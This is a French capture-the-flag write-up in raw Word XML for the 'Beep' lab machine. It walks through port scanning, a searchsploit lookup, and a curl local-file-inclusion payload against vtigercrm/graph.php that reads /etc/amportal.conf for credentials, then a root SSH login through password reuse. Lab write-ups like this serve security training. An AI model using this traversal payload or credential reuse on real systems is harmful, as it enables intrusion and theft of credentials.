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FDB7" w14:textId="6020EACD" w:rsidR="00E211E5" w:rsidRDefault="008F7D71">
      <w:r>
        <w:t>[info]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC99A1" w14:textId="55EDE95B" w:rsidR="008F7D71" w:rsidRPr="002B030C" w:rsidRDefault="008F7D71" w:rsidP="002B030C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B030C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231E3921" w14:textId="248770B5" w:rsidR="008F7D71" w:rsidRDefault="00C04B68">
      <w:r>
        <w:t>La machine distante est un Linux dont l’adresse IP est 10.10.10.7.</w:t>
      </w:r>
      <w:r w:rsidR="00DB23BD">
        <w:t xml:space="preserve"> Beep contient beaucoup de ports et services ouverts, ce qui peut rendre hésitant concernant le chemin faillible</w:t>
      </w:r>
      <w:r w:rsidR="00A63168">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1DD8F6" w14:textId="30C74CF7" w:rsidR="00C04B68" w:rsidRDefault="00C04B68">
      <w:r>
        <w:t>Compétences mises en œuvre :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E0729A" w14:textId="2CB8C472" w:rsidR="00C04B68" w:rsidRDefault="00C04B68" w:rsidP="00C04B68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47550AAD" w14:textId="270AB2BD" w:rsidR="00A63168" w:rsidRDefault="00902139" w:rsidP="00C04B68">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enumération des fichiers/dossiers d’un serveur web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6077D587" w14:textId="0A6AABB5" w:rsidR="00902139" w:rsidRDefault="00902139" w:rsidP="00C04B68">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recherche et exploitation de CVE</w:t>
      </w:r>
      <w:r w:rsidR="00C1340A">
        <w:t>/exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFB29B0" w14:textId="77777777" w:rsidR="002B030C" w:rsidRDefault="002B0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47E5AC" w14:textId="0B8D0B67" w:rsidR="008F7D71" w:rsidRPr="002B030C" w:rsidRDefault="008F7D71" w:rsidP="002B030C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B030C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enumération</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D5B0CF" w14:textId="77777777" w:rsidR="004A64D9" w:rsidRDefault="004A64D9"/>
    <w:p w14:paraId="7EA0966D" w14:textId="449F6AEC" w:rsidR="008F7D71" w:rsidRDefault="00B9280D">
      <w:r>
        <w:t>Nous commençons avec une énumération de ports et services </w:t>
      </w:r>
      <w:r w:rsidR="004A64D9">
        <w:t>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4D9" w14:paraId="035F0BAB" w14:textId="77777777" w:rsidTr="004A64D9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04A32F6D" w14:textId="19D7F1E2" w:rsidR="004A64D9" w:rsidRDefault="004A64D9">
            <w:r>
              <w:t>$ nmap -T4 -A 10.10.10.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09A972A2" w14:textId="5EDFB01F" w:rsidR="004A64D9" w:rsidRDefault="004A64D9"/>
    <w:p w14:paraId="46748428" w14:textId="383CCEAB" w:rsidR="004A64D9" w:rsidRDefault="004A64D9">
      <w:r>
        <w:t>[nmap]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD156C8" w14:textId="7897627D" w:rsidR="004A64D9" w:rsidRDefault="004A64D9">
      <w:r>
        <w:t>Beaucoup de ports sont ouverts, pour l’instant nous allons nous concentrer sur le</w:t>
      </w:r>
      <w:r w:rsidR="00D40435">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
      <w:r w:rsidR="00D40435">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
      <w:r w:rsidR="00D40435">
        <w:t xml:space="preserve"> et 443</w:t>
      </w:r>
      <w:r>
        <w:t>, le service associé est un apache httpd en version 2.2.3.</w:t>
      </w:r>
      <w:r w:rsidR="00D40435">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00042315">
        <w:t>Avant de faire l’énumération de dossiers et fichiers, nous faisons un rapide tour sur le site :</w:t>
      </w:r>
      <w:r w:rsidR="00A80075">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AA3EA5" w14:textId="4CB32969" w:rsidR="00A80075" w:rsidRDefault="00A80075">
      <w:r>
        <w:t>Avec ces informations, nous pouvons rechercher un exploit avec searchsploit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0075" w14:paraId="618CBF89" w14:textId="77777777" w:rsidTr="00A80075">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3413400B" w14:textId="5C996C93" w:rsidR="00A80075" w:rsidRDefault="00A80075">
            <w:r>
              <w:t>$ searchsploit -w Elastix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="104875BE" w14:textId="3A1C516A" w:rsidR="00A80075" w:rsidRDefault="00A80075"/>
    <w:p w14:paraId="6B6C1D48" w14:textId="24E587F5" w:rsidR="00A2448E" w:rsidRDefault="00A2448E">
      <w:r>
        <w:t>[searchsploit]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149D8957" w14:textId="0AC12E81" w:rsidR="00D94870" w:rsidRDefault="0068208A">
      <w:r>
        <w:t xml:space="preserve">L’exploit 37637 permet une LFI, ce qui nous permettrait de </w:t>
      </w:r>
      <w:r w:rsidR="00BA0EBF">
        <w:t>lire/d’exploiter des fichiers du serveur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F05B97" w14:textId="77777777" w:rsidR="002B030C" w:rsidRDefault="002B0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CC9F482" w14:textId="0A7B2969" w:rsidR="008F7D71" w:rsidRPr="002B030C" w:rsidRDefault="008F7D71" w:rsidP="002B030C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B030C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B07D28" w14:textId="444CC3A7" w:rsidR="00735E73" w:rsidRDefault="00735E73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Nous allons donc sur le lien suivant pour savoir comment exécuter notre LFI :</w:t>
      </w:r>
      <w:r w:rsidR="00A27EF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00A27EF6" w:rsidRPr="001C106B">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/37637/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D9375D8" w14:textId="77DD3F97" w:rsidR="00A27EF6" w:rsidRDefault="002D0762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D’après l’explication, il suffit d</w:t>
      </w:r>
      <w:r w:rsidR="00665772">
        <w:rPr>
          <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00BA0EBF">
        <w:rPr>
          <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
        </w:rPr>
        <w:t>exécuter</w:t>
      </w:r>
      <w:r w:rsidR="00665772">
        <w:rPr>
          <w:rFonts w:ascii="ProximaNova-Regular" w:hAnsi="ProximaNova-Regular" w:cs="ProximaNova-Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> la commande suivante pour lister les utilisateurs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5772" w14:paraId="5341255A" w14:textId="77777777" w:rsidTr="00665772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BE24A17" w14:textId="757E6C15" w:rsidR="00665772" w:rsidRDefault="00665772" w:rsidP="006657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65772">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&amp;module=Accounts&amp;action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76F46E1C" w14:textId="77777777" w:rsidR="00665772" w:rsidRPr="00A27EF6" w:rsidRDefault="00665772"/>
    <w:p w14:paraId="53D0A019" w14:textId="202A1054" w:rsidR="00CD767C" w:rsidRDefault="00BA0EBF">
      <w:r>
        <w:t>En complétant avec nos informations, cela donne le payload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0EBF" w14:paraId="330FB8EA" w14:textId="77777777" w:rsidTr="00BA0EBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DEEF3E6" w14:textId="7A19C523" w:rsidR="00BA0EBF" w:rsidRDefault="00BA0EBF">
            <w:r>
              <w:t>$ curl https://10.10.10.7/</w:t>
            </w:r>
            <w:r w:rsidR="00243D5A" w:rsidRPr="00665772">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&amp;module=Accounts&amp;action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76F495F7" w14:textId="00BDC452" w:rsidR="00BA0EBF" w:rsidRDefault="00BA0EBF"/>
    <w:p w14:paraId="0B21207C" w14:textId="025F7C35" w:rsidR="00FB641D" w:rsidRDefault="00FB641D">
      <w:r>
        <w:t>[curl]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242CB8C0" w14:textId="262A9DC5" w:rsidR="00623E5F" w:rsidRDefault="00972476">
      <w:r>
        <w:t xml:space="preserve">Nous avons donc un identifiant et mot de passe, nous pouvons </w:t>
      </w:r>
      <w:r w:rsidR="004D2DD1">
        <w:t>essayer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> d’utiliser le même mot de passe pour les autres utilisateurs en ssh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2476" w14:paraId="35ABC7C0" w14:textId="77777777" w:rsidTr="00972476">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D1D3CA2" w14:textId="03E800D4" w:rsidR="00972476" w:rsidRDefault="00972476">
            <w:r>
              <w:t>$ ssh root@10.10.10.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C14A855" w14:textId="451F453E" w:rsidR="00972476" w:rsidRDefault="00972476"/>
    <w:p w14:paraId="5BB04672" w14:textId="4E83BA61" w:rsidR="004D2DD1" w:rsidRDefault="004D2DD1">
      <w:r>
        <w:t>[ssh]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E920D21" w14:textId="049258BC" w:rsidR="00F30858" w:rsidRDefault="00F30858">
      <w:r>
        <w:t>Ici nous avons du password re-use, ce qui nous permet d’être root sur la machine, nous finissons par aller chercher les flags pour finir la box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0858" w14:paraId="5A631370" w14:textId="77777777" w:rsidTr="00F30858">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F90D1DC" w14:textId="77777777" w:rsidR="00F30858" w:rsidRDefault="00F379E6">
            <w:r>
              <w:t>$ cat /home/fanis/user.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="329006D6" w14:textId="298973FB" w:rsidR="00F379E6" w:rsidRDefault="00F379E6">
            <w:r>
              <w:t>$ cat /root/root.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D62D85E" w14:textId="646EDA5A" w:rsidR="00F30858" w:rsidRDefault="00F30858"/>
    <w:p w14:paraId="0BBB9859" w14:textId="2BA0781B" w:rsidR="00F30858" w:rsidRDefault="00F30858">
      <w:r>
        <w:t>[flag]</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F30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73A0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02CCA744"/>
    <w:lvl w:ilvl="0" w:tplc="87728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E8"/>
    <w:rsid w:val="00042315"/>
    <w:rsid w:val="0021052D"/>
    <w:rsid w:val="00243D5A"/>
    <w:rsid w:val="002B030C"/>
    <w:rsid w:val="002D0762"/>
    <w:rsid w:val="004A64D9"/>
    <w:rsid w:val="004D2DD1"/>
    <w:rsid w:val="005075DD"/>
    <w:rsid w:val="00623E5F"/>
    <w:rsid w:val="00665772"/>
    <w:rsid w:val="0068208A"/>
    <w:rsid w:val="007109F2"/>
    <w:rsid w:val="00735E73"/>
    <w:rsid w:val="008F7D71"/>
    <w:rsid w:val="00902139"/>
    <w:rsid w:val="00972476"/>
    <w:rsid w:val="00976C4F"/>
    <w:rsid w:val="00A2448E"/>
    <w:rsid w:val="00A27EF6"/>
    <w:rsid w:val="00A63168"/>
    <w:rsid w:val="00A80075"/>
    <w:rsid w:val="00B406E8"/>
    <w:rsid w:val="00B9280D"/>
    <w:rsid w:val="00BA0EBF"/>
    <w:rsid w:val="00C04B68"/>
    <w:rsid w:val="00C1340A"/>
    <w:rsid w:val="00CD767C"/>
    <w:rsid w:val="00D40435"/>
    <w:rsid w:val="00D94870"/>
    <w:rsid w:val="00DB23BD"/>
    <w:rsid w:val="00F30858"/>
    <w:rsid w:val="00F379E6"/>
    <w:rsid w:val="00F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C29B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{966F8B9E-3A32-4C0E-A76E-C1210EF9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B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27E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7EF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57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65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loit-db.com/exploits/376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26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-28T06:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-28T12:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>